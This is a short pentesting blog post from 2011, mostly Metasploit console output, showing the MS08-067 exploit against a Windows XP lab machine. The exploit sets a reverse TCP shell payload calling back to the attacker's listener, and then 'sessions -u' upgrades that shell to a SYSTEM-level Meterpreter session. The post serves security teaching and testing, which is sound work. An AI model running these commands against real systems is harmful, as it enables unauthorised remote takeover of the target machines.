Metasploit Meterpreter Command Shell Upgrade

Seeing is believing 🙂

root@bt:~# msfconsole
=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z
[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, command shell is on the background now, what if we want to change that existing command shell session into meterpreter session? re-exploit? Oops, you should forget about to re-exploit, Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the -u option. Let’s try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields
msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, new meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

nice feature, good job Metasploit team 😉

modpr0be
modpr0be

Posisi saya saat ini sebagai direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation.

Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE).

Jika ingin menghubungi saya dapat melalui email bisnis di tom at spentera dot id atau pribadi di me at modpr0 dot be

Articles: 64

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.